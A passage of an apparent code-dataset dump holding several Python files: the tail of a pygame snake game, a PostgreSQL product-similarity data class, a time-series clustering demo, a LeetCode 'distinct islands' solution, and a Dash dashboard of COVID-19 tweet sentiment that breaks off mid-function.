\n if snake_position[0] in snake_position[2:]:\n crashed = True\n\n#ends game if the snake head lands on the fake food (compare positions, not membership)\n if snake_position[0] == [rfood_x, rfood_y]:\n crashed = True\n\n#these two statements need to be at the end of the pithon definition\n\n pygame.display.update()\n clock.tick(7)\n\npithon()\n#specific method to quit pygame\npygame.quit()\nquit()\n","sub_path":"pithon.py","file_name":"pithon.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"132036258","text":"import psycopg2\nfrom psycopg2.extras import DictCursor\nimport os \n\n\nclass Data:\n\n def __init__(self):\n self.connection_string = os.environ.get('PSQL_CONNECTION_STRING', False)\n self.conn = psycopg2.connect(self.connection_string)\n self.cursor = self.conn.cursor(cursor_factory=DictCursor)\n\n def get_live_products(self):\n query = \"\"\"\n select product_id,\n Image as fname \n from product_productimage pi\n inner join product_product p\n on p.id = pi.product_id\n where sort_order = 0\n and image not like '%na_image%'\n \"\"\"\n 
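# The query above keeps only each product's first image (sort_order = 0)\n # and skips placeholder images; the loop below flattens the cursor rows\n # into [{'id': ..., 'fname': ...}, ...] for the caller.\n 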
self.cursor.execute(query)\n result = list()\n for row in self.cursor:\n result.append({'id':row[0], 'fname':row[1]})\n return result\n\n def clear_similarity_table(self):\n cursor = self.conn.cursor()\n query = \"\"\"\n truncate product_productsimilarity;\n \"\"\"\n cursor.execute(query)\n self.conn.commit()\n\n def save_similarities(self, distances):\n cursor = self.conn.cursor()\n insert_query = 'insert into \\\n product_productsimilarity \\\n (product_id, similar_products) values %s'\n psycopg2.extras.execute_values (\n cursor, \n insert_query, \n distances, \n template=None, \n page_size=100\n )\n self.conn.commit()\n\n def close_connections(self):\n self.conn.close()","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614774671","text":"#!/usr/bin/env python\n\n\"\"\"\nThis implements a time Warping example\n\"\"\"\nimport os,sys,inspect\nimport numpy as np\nfrom sklearn import mixture\nfrom sklearn.externals.six.moves import xrange\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \nfrom tsc import *\n\n# Number of samples per component\nn_samples = 100\n\n# Generate random sample following a sine curve\nnp.random.seed(0)\nX = np.zeros((n_samples, 2))\nstep = 4 * np.pi / n_samples\n\nfor i in xrange(X.shape[0]):\n\tx = i * step - 6\n\tX[i, 0] = x + np.random.normal(0, 0.15)\n\tX[i, 1] = 3 * (np.sinc(x) + np.random.normal(0, .15))\n\n\n# Number of samples per component\nn_samples = 200\n\n# Generate random sample following a sine curve\nnp.random.seed(0)\nY = np.zeros((n_samples, 2))\nstep = 4 * np.pi / n_samples\n\nfor i in xrange(Y.shape[0]):\n\tx = i * step - 6\n\tY[i, 0] = x + np.random.normal(0, 0.15)\n\tY[i, 1] = 2 * (np.sinc(x) + np.random.normal(0, .15))\n\n\t\t\na = TransitionStateClustering(window_size=2)\na.addDemonstration(X)\na.addDemonstration(Y)\na.fit(normalize=True)\n\nplt.subplot(1,2,1)\nplt.scatter(X[:,0], X[:,1], color='b')\nplt.scatter(Y[:,0], Y[:,1], color='r')\nplt.scatter(X[a.segmentation[0],0], X[a.segmentation[0],1], s=100,color='k')\nplt.scatter(Y[a.segmentation[1],0], Y[a.segmentation[1],1], s=100,color='k')\n\nplt.xlim(-8, 4 * np.pi - 6+2)\nplt.ylim(-5, 5)\nplt.title(\"TSC With RBF Normalization\")\n\na = TransitionStateClustering(window_size=2)\na.addDemonstration(X)\na.addDemonstration(Y)\na.fit(normalize=False)\n\nplt.subplot(1,2,2)\nplt.scatter(X[:,0], X[:,1], color='b')\nplt.scatter(Y[:,0], Y[:,1], color='r')\nplt.scatter(X[a.segmentation[0],0], X[a.segmentation[0],1], s=100,color='k')\nplt.scatter(Y[a.segmentation[1],0], Y[a.segmentation[1],1], s=100,color='k')\n\nplt.xlim(-8, 4 * np.pi - 6+2)\nplt.ylim(-5, 5)\nplt.title(\"TSC Without RBF Normalization\")\nplt.show()","sub_path":"tsc/examples/timeWarp.py","file_name":"timeWarp.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"585127532","text":"'''\n694. Number of Distinct Islands\n\nGiven a non-empty 2D array grid of 0's and 1's, an island is a group of 1's (representing land) connected 4-directionally (horizontal or vertical.) You may assume all four edges of the grid are surrounded by water.\n\nCount the number of distinct islands. 
An island is considered to be the same as another if and only if one island can be translated (and not rotated or reflected) to equal the other.\n\nExample 1:\n11000\n11000\n00011\n00011\nGiven the above grid map, return 1.\nExample 2:\n11011\n10000\n00001\n11011\nGiven the above grid map, return 3.\n\nNotice that:\n11\n1\nand\n 1\n11\nare considered different island shapes, because we do not consider reflection / rotation.\nNote: The length of each dimension in the given grid does not exceed 50.\n'''\n\nclass Solution(object):\n def numDistinctIslands(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n # Best solution:\n # m, n = len(grid), len(grid[0])\n # def dfs(i, j, posr, posc):\n # coord.append((posr, posc))\n # grid[i][j] = 0\n # if i < m - 1 and grid[i + 1][j]:\n # dfs(i + 1, j, posr + 1, posc)\n # if i > 0 and grid[i - 1][j]:\n # dfs(i - 1, j, posr - 1, posc)\n # if j < n - 1 and grid[i][j + 1]:\n # dfs(i, j + 1, posr, posc + 1)\n # if j > 0 and grid[i][j - 1]:\n # dfs(i, j - 1, posr, posc - 1)\n # d = collections.Counter()\n # for i in xrange(m):\n # for j in xrange(n):\n # if grid[i][j]:\n # coord = []\n # dfs(i, j, 0, 0)\n # d[tuple(coord)]+=1\n # return len(d)\n \n \n # Better solution:\n # numrows, numcols = len(grid), len(grid[0])\n # def expand(x, y):\n # if 0 <= x < numrows and 0 <= y < numcols and grid[x][y] == 1:\n # grid[x][y] = 0\n # d = \"d\"+expand(x-1,y)\n # u = \"u\"+expand(x+1,y)\n # l = \"l\"+expand(x,y-1)\n # r = \"r\"+expand(x,y+1)\n # return d+u+l+r\n # return \"\"\n # islands = set() \n # for i in range(numrows):\n # for j in range(numcols):\n # if grid[i][j] == 1:\n # islands.add(expand(i,j))\n # return len(islands)\n \n \n if not grid:\n return 0\n m,n = len(grid),len(grid[0])\n \n shapes = []\n res = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1:\n shape = []\n self.dfs(grid, i, j, shape)\n if not shape in shapes:\n res += 1\n shapes.append(shape)\n return res\n \n def dfs(self, grid, i, j, shape):\n # print i, j\n grid[i][j] = 0\n \n if i+1 < len(grid) and grid[i+1][j] == 1:\n shape.append('d')\n self.dfs(grid, i+1, j, shape)\n if j+1 < len(grid[0]) and grid[i][j+1] == 1:\n shape.append('r')\n self.dfs(grid, i, j+1, shape)\n if i-1 >= 0 and grid[i-1][j] == 1:\n shape.append('u')\n self.dfs(grid, i-1, j, shape)\n if j-1 >= 0 and grid[i][j-1] == 1:\n shape.append('l')\n self.dfs(grid, i, j-1, shape)\n shape.append('b')\n","sub_path":"694_NumberOfDistinctIslands.py","file_name":"694_NumberOfDistinctIslands.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"147258063","text":"import os\r\nimport pathlib\r\n\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_table\r\nimport plotly.graph_objs as go\r\nimport plotly.express as px\r\nfrom plotly.subplots import make_subplots\r\nimport dash_daq as daq\r\n\r\nfrom datetime import datetime as dt\r\nimport pandas as pd\r\n\r\napp = dash.Dash(\r\n __name__,\r\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}],\r\n)\r\napp.title = 'COVID Tweets Sentiment Dashboard'\r\nserver = app.server\r\napp.config[\"suppress_callback_exceptions\"] = True\r\n\r\nAPP_PATH = str(pathlib.Path(__file__).parent.resolve())\r\n\r\ndf_day = pd.read_csv(os.path.join(APP_PATH, os.path.join(\"data\", \"day_wise.csv\")))\r\ndf_day['date'] = 
pd.to_datetime(df_day['date'])\r\n#df_day.set_index('date', inplace=True)\r\n#df_day.index = pd.to_datetime(df_day.index)\r\ndf_day= df_day.sort_values(by='date')\r\n\r\ndf_phase = pd.read_csv(os.path.join(APP_PATH, os.path.join(\"data\", \"phase_wise.csv\")))\r\n#df_phase.set_index('phase', inplace=True)\r\ndf_phase['start'] = pd.to_datetime(df_phase['start'])\r\ndf_phase['end'] = pd.to_datetime(df_phase['end'])\r\ndf_phase['date_mpos'] = pd.to_datetime(df_phase['date_mpos'])\r\ndf_phase['date_mneg'] = pd.to_datetime(df_phase['date_mneg'])\r\ndf_phase= df_phase.sort_values(by='start')\r\nphases = ['Lockdown 1', 'Lockdown 2', 'Lockdown 3', 'Lockdown 4', 'Unlock 1', 'Unlock 2']\r\nvals = [0,1,2,3,4,5]\r\n\r\ndef build_banner():\r\n return html.Div(\r\n id=\"banner\",\r\n className=\"banner\",\r\n children=[\r\n html.Div(\r\n id=\"banner-text\",\r\n children=[\r\n html.H5(\"SENTIMENT ANALYSIS OF COVID-19 TWEETS\"),\r\n html.H6(\"Infering people's daily reactions and with various phases of lockdown\"),\r\n ],\r\n ),\r\n html.Div(\r\n id=\"banner-logo\",\r\n children=[\r\n html.Button(\r\n id=\"learn-more-button\", children=\"KNOW MORE ABOUT THE PROJECT\", n_clicks=0\r\n ),\r\n html.Img(id=\"logo\", src=app.get_asset_url(\"Logo.png\")),\r\n ],\r\n ),\r\n ],\r\n )\r\n\r\n\r\ndef build_tabs():\r\n return html.Div(\r\n id=\"tabs\",\r\n className=\"tabs\",\r\n children=[\r\n dcc.Tabs(\r\n id=\"app-tabs\",\r\n value=\"tab1\",\r\n className=\"custom-tabs\",\r\n children=[\r\n dcc.Tab(\r\n id=\"day-tab\",\r\n label=\"day wise statistics dashboard\",\r\n value=\"tab1\",\r\n className=\"custom-tab\",\r\n selected_className=\"custom-tab--selected\",\r\n ),\r\n dcc.Tab(\r\n id=\"phase-tab\",\r\n label=\"phase wise statistics Dashboard\",\r\n value=\"tab2\",\r\n className=\"custom-tab\",\r\n selected_className=\"custom-tab--selected\",\r\n ),\r\n ],\r\n )\r\n ],\r\n )\r\n\r\n\r\ndef generate_daywiseplot():\r\n df = df_day\r\n fig = make_subplots(rows=3, cols=1,\r\n shared_xaxes=True)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['pos'],\r\n mode='lines+markers',\r\n name = 'pos',\r\n connectgaps=True, marker_color='rgb(35,132,67)'),\r\n row=1, col=1)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['neg'],\r\n mode='lines+markers',\r\n name = 'neg',\r\n connectgaps=True, marker_color='rgb(244,59,44)'),\r\n row=2, col=1)\r\n fig.add_trace(go.Scatter(x = df['date'], y = df['neut'],\r\n mode='lines+markers',\r\n name = 'neut',\r\n connectgaps=True, marker_color='rgb(62,83,160)'),\r\n row=3, col=1)\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n height = 500,\r\n legend=dict(\r\n orientation=\"h\",\r\n yanchor=\"bottom\", y=1.02,\r\n xanchor=\"right\", x=1),\r\n title={\r\n 'text': \"Count of COVID19 Tweets Sentiment Wise per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'},\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n )\r\n fig.update_xaxes(showline=False, linewidth=2,showticklabels=False,\r\n #ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n showgrid = False, zeroline=False, row=1, col=1)\r\n fig.update_xaxes(showline=False, linewidth=2,showticklabels=False,\r\n #ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n showgrid = False, zeroline=False, row=2, col=1)\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, 
tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=10, matches='x',\r\n showgrid = False, zeroline=False, row=3, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=1, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=2, col=1)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n showgrid=False, zeroline=False, row=3, col=1)\r\n return dcc.Graph(\r\n id=\"daywiseplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_totplot():\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df_day['date'], y =df_day['tot'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'\r\n )\r\n )\r\n\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Total Count of COVID19 Tweets per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=10,\r\n #rangeslider_visible=True\r\n )\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Count of COVID-19 realted tweets', title_standoff=25)\r\n #fig.update_xaxes(rangeslider_visible=True)\r\n\r\n #fig.update_layout(xaxis_range=['2020-03-21',])\r\n return dcc.Graph(\r\n id=\"totplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_scoreplot():\r\n df = df_day\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['date'], y = df['avg'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Sentiment Score of COVID19 Tweets per day\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10,\r\n title_text='Date', title_standoff=15,\r\n rangeslider_visible=True)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Sentiment Score', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"scoreplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_barplot():\r\n fig = go.Figure()\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['neg'],\r\n name='Negative Tweets',\r\n marker_color='rgb(244,59,44)'\r\n ))\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['pos'],\r\n name='Positive Tweets',\r\n marker_color='rgb(35,132,67)'\r\n ))\r\n fig.add_trace(go.Bar(\r\n x=df_phase['phase'], y=df_phase['neut'],\r\n name='Neutral Tweets',\r\n marker_color='rgb(62,83,160)'\r\n ))\r\n\r\n fig.update_layout(template='plotly_dark',\r\n 
#paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n barmode='group', xaxis_tickangle=-45,\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n height = 800,\r\n legend=dict(\r\n orientation=\"h\",\r\n yanchor=\"bottom\", y=1.02,\r\n xanchor=\"right\", x=1),\r\n title={\r\n 'text': \"Count of COVID19 Tweets Sentiment Wise per Phase\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'},\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n title_text='Phase', title_standoff=10,\r\n #rangeslider_visible=True\r\n )\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Count of COVID-19 tweets', title_standoff=25)\r\n #fig.update_xaxes(rangeslider_visible=True)\r\n\r\n #fig.update_layout(xaxis_range=['2020-03-21',])\r\n return dcc.Graph(\r\n id=\"barplot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_c1plot():\r\n df = df_phase\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['phase'], y = df['avg'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"Sentiment Score of COVID19 Tweets Phase-wise\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10, tickangle=-45,\r\n title_text='Phase', title_standoff=15,\r\n rangeslider_visible=False)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='Sentiment Score', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"c1plot\", responsive=True,\r\n figure = fig)\r\n\r\ndef generate_c2plot():\r\n df = df_phase\r\n fig = go.Figure()\r\n fig.add_trace(go.Scatter(x=df['phase'], y = df['p/n'],\r\n mode='lines+markers',\r\n connectgaps=True, marker_color='rgb(135,44,162)'))\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n xaxis_showgrid=False,\r\n yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': \"P/N Ratio Phase-wise\",\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_xaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=10, tickangle=-45,\r\n title_text='Phase', title_standoff=15,\r\n rangeslider_visible=False)\r\n fig.update_yaxes(showline=True, linewidth=2,\r\n ticks=\"outside\", tickwidth=2, tickcolor='crimson', ticklen=20,\r\n title_text='P/N Ratio', title_standoff=25,\r\n zeroline=True, zerolinewidth=2, zerolinecolor='Red')\r\n\r\n return dcc.Graph(\r\n id=\"c2plot\", responsive=True,\r\n figure = fig)\r\n\r\n\r\n\r\ndef build_tab_1():\r\n return [\r\n # day wise statistics\r\n html.Div(\r\n id='daywiseplot',\r\n className='daywiseplot',\r\n children=[\r\n html.Div(\r\n className=\"row\",\r\n children=[\r\n # Column for user controls\r\n html.Div(\r\n className=\"four columns 
div-user-controls\",\r\n children=[\r\n html.H2(\"SINGLE DAY SUMMARY\"),\r\n html.P(\r\n \"\"\"Select a particular day using the date picker\r\n for viewing specific summary and statistics.\"\"\"\r\n ),\r\n html.Div(\r\n className=\"div-for-dropdown\",\r\n children=[\r\n dcc.DatePickerSingle(\r\n id=\"date-picker\",\r\n min_date_allowed=dt(2020, 3, 21),\r\n max_date_allowed=dt(2020, 7, 12),\r\n initial_visible_month=dt(2020, 3, 21),\r\n date=dt(2020, 3, 21).date(),\r\n display_format=\"MMMM D, YYYY\",\r\n style={\"border\": \"0px solid black\"}\r\n )\r\n ]\r\n )\r\n ]\r\n ),\r\n # Column for app graphs and plots\r\n html.Div(\r\n className=\"eight columns div-for-charts bg-grey\",\r\n children=[\r\n dcc.Graph(id='piechart', responsive=True),\r\n html.Div(id='daystats', className='daystats')\r\n ]\r\n )\r\n ]\r\n ),\r\n html.Div(\r\n className='totplot',\r\n children=[generate_totplot()]\r\n ),\r\n html.Div(\r\n className='daywiseplot',\r\n children=[generate_daywiseplot()]\r\n ),\r\n html.Div(\r\n className='scoreplot',\r\n children=[generate_scoreplot()]\r\n )\r\n ]\r\n )\r\n ]\r\n\r\ndef build_tab_2():\r\n return [\r\n # day wise statistics\r\n html.Div(\r\n id='phasewiseplot',\r\n className='phasewiseplot',\r\n children=[\r\n html.Div(\r\n className=\"row\",\r\n children=[\r\n # Column for user controls\r\n html.Div(\r\n className=\"four columns div-user-controls\",\r\n children=[\r\n html.H2(\"SINGLE PHASE SUMMARY\"),\r\n html.P(\r\n \"\"\"Select a particular phase using the dropdown\r\n for viewing specific summary and statistics.\"\"\"\r\n ),\r\n html.Div(\r\n className=\"div-for-dropdown\",\r\n children=[\r\n dcc.Dropdown(\r\n id=\"phase-dropdown\",\r\n options=[\r\n {\"label\": i, \"value\": j}\r\n for (i,j) in zip(phases, vals)\r\n ],\r\n value=0,\r\n placeholder=\"Select a Phase\",\r\n clearable=False\r\n )\r\n ]\r\n )\r\n ]\r\n ),\r\n # Column for app graphs and plots\r\n html.Div(\r\n className=\"eight columns div-for-charts bg-grey\",\r\n children=[\r\n dcc.Graph(id=\"pie-graph\", className='pie-graph'),\r\n html.Div(id='phasestats', className='phasestats')\r\n ]\r\n )\r\n ]\r\n ),\r\n html.Div(\r\n className='barplot',\r\n children=[generate_barplot()]\r\n ),\r\n html.Div(\r\n className='row', id='twoplots',\r\n children=[\r\n html.Div(\r\n className='six columns',\r\n children=[\r\n html.Div(className='c1',\r\n children=[html.H3('Sentiment Score Phase-wise')]),\r\n generate_c1plot()\r\n ]),\r\n html.Div(\r\n className='six columns',\r\n children=[\r\n html.Div(className='c2',\r\n children=[html.H3('P/N Ratio Phase-wise')]),\r\n generate_c2plot()\r\n ])\r\n ])\r\n ])\r\n ]\r\n\r\ndef generate_modal():\r\n return html.Div(\r\n id=\"markdown\",\r\n className=\"modal\",\r\n children=(\r\n html.Div(\r\n id=\"markdown-container\",\r\n className=\"markdown-container\",\r\n children=[\r\n html.Div(\r\n className=\"close-container\",\r\n children=html.Button(\r\n \"Close\",\r\n id=\"markdown_close\",\r\n n_clicks=0,\r\n className=\"closeButton\",\r\n ),\r\n ),\r\n html.Div(\r\n className=\"markdown-text\",\r\n children=dcc.Markdown(\r\n children=(\r\n \"\"\"\r\n #### **ABOUT PROJECT**\r\n\r\n This is a dashboard for monitoring sentiment of COVID19 related tweets. It is a webapp built using [dash](https://plotly.com/dash/). This project is hosted [here](https://github.com/SmartPracticeschool/SBSPS-Challenge-4564-Sentiment-Analysis-Dashboard-of-COVID-19-tweets). 
One can also build it locally by cloning the repository.\r\n\r\n > ###### This project is part of [**IBM HACK CHALLENGE 2020**](https://smartinternz.com/ibm-hack-challenge-2020).\r\n\r\n ###### How to Use:\r\n * Phases in the app mean the various phases of lockdown exercised as mentioned [here]().\r\n * p/n ratio denotes the count of positive tweets per negative tweet.\r\n * You may encounter the following abbreviations:\r\n * pos stands for Positive\r\n * neg stands for Negative\r\n * neut stands for Neutral\r\n\r\n\r\n ###### The following issues still exist with the project (sorry for your inconvenience):\r\n * Due to unavailability of the Twitter API, this does not update in real time and data is taken from the web.\r\n * As there is no automated script yet, this app will be updated manually once per week.\r\n * This app is not yet fully responsive for all screen sizes.\r\n\r\n > ###### Data Source: Data used in the app can be found [here](https://ieee-dataport.org/open-access/coronavirus-covid-19-tweets-dataset). It is processed using [these scripts](https://github.com/SmartPracticeschool/SBSPS-Challenge-4564-Sentiment-Analysis-Dashboard-of-COVID-19-tweets/tree/master/data_preprocessing).\r\n\r\n #### Connect with me:\r\n * [**Github**](https://github.com/avats-dev)\r\n * [**LinkedIn**](https://www.linkedin.com/in/avats-dev/)\r\n * [**Gmail**](mailto:avats.dev@gmail.com)\r\n\r\n > _**Feel free to drop feedback and suggestions !!**_\r\n\r\n \"\"\"\r\n )\r\n ),\r\n ),\r\n ],\r\n )\r\n ),\r\n )\r\n\r\n\r\n\r\napp.layout = html.Div(\r\n id=\"big-app-container\",\r\n children=[\r\n build_banner(),\r\n html.Div(\r\n id=\"app-container\",\r\n children=[\r\n build_tabs(),\r\n # Main app\r\n html.Div(id=\"app-content\"),\r\n ],\r\n ),\r\n #dcc.Store(id=\"value-setter-store\", data=init_value_setter_store()),\r\n dcc.Store(id=\"n-interval-stage\", data=50),\r\n generate_modal(),\r\n ],\r\n)\r\n\r\n\r\n# ======= Callbacks for modal popup =======\r\n@app.callback(\r\n Output(\"markdown\", \"style\"),\r\n [Input(\"learn-more-button\", \"n_clicks\"), Input(\"markdown_close\", \"n_clicks\")],\r\n)\r\ndef update_click_output(button_click, close_click):\r\n ctx = dash.callback_context\r\n\r\n if ctx.triggered:\r\n prop_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\r\n if prop_id == \"learn-more-button\":\r\n return {\"display\": \"block\"}\r\n\r\n return {\"display\": \"none\"}\r\n\r\n\r\n# callback for tab selection\r\n@app.callback(\r\n [Output(\"app-content\", \"children\")],\r\n [Input(\"app-tabs\", \"value\")]\r\n)\r\ndef render_tab_content(tab_switch):\r\n if tab_switch == \"tab1\":\r\n return build_tab_1()\r\n return build_tab_2()\r\n\r\n\r\n# Update piechart day\r\n@app.callback(\r\n output=Output(\"piechart\", \"figure\"),\r\n inputs=[Input(\"date-picker\", \"date\")]\r\n)\r\ndef update_piechart_d(sdate):\r\n df = df_day\r\n sdate = sdate\r\n #sdate = dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df[(df['date']==str(sdate))]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n labels = ['Positive Tweets', 'Negative Tweets', 'Neutral Tweets']\r\n values = [p, n, nt]\r\n\r\n tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = tdate.strftime(\"%d-%b-%Y\")\r\n title = 'Statistics of ' + tdate\r\n fig = go.Figure(data=[go.Pie(labels=labels, values=values, textinfo='label+percent',\r\n insidetextorientation='radial',\r\n marker_colors=['rgb(35,132,67)', 'rgb(244,59,44)', 'rgb(62,83,160)']\r\n )])\r\n\r\n fig.update_traces(textposition='inside')\r\n 
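# The update_layout call below applies the same dark template, Raleway\r\n    # font, and centered title used by the other figures; a shared helper,\r\n    # e.g. style_pie(fig, title), could factor this out (suggested name\r\n    # only, not present in this source).\r\n    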
fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n #xaxis_showgrid=False,\r\n #yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': title,\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_layout(margin=dict(t=80, b=20, l=0, r=0))\r\n\r\n return fig\r\n\r\n\r\n# show day stats\r\n@app.callback(\r\n output=Output(\"daystats\", \"children\"),\r\n inputs=[Input(\"date-picker\", \"date\")]\r\n)\r\ndef update_dstats(sdate):\r\n df = df_day\r\n sdate = sdate\r\n #sdate = dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df[(df['date']==str(sdate))]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n av = df.iloc[0].avg\r\n pn = df.iloc[0]['p/n']*1000\r\n\r\n tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = tdate.strftime(\"%d-%b-%Y\")\r\n title = 'Statistics of ' + tdate\r\n\r\n return [\r\n html.H3(title),\r\n html.P('Total count of positive tweets on ' + tdate + ' : ' + str(p)),\r\n html.P('Total count of negative tweets on ' + tdate + ' : ' + str(n)),\r\n html.P('Total count of neutral tweets on ' + tdate + ' : ' + str(nt)),\r\n html.P('Average Sentiment Score of tweets on ' + tdate + ' : ' + str(av)),\r\n html.P('Total positive tweets per 1k negative tweets on ' + tdate + ' : ' + str(round(pn)))\r\n ]\r\n\r\n# update piechart phase\r\n@app.callback(\r\n output=Output(\"pie-graph\", \"figure\"),\r\n inputs=[Input(\"phase-dropdown\", \"value\")]\r\n)\r\ndef update_piechart_p(val):\r\n df = df_phase\r\n filter = [False, False, False, False, False, False]\r\n filter[val]=True\r\n sphase = phases[val]\r\n #sdate = 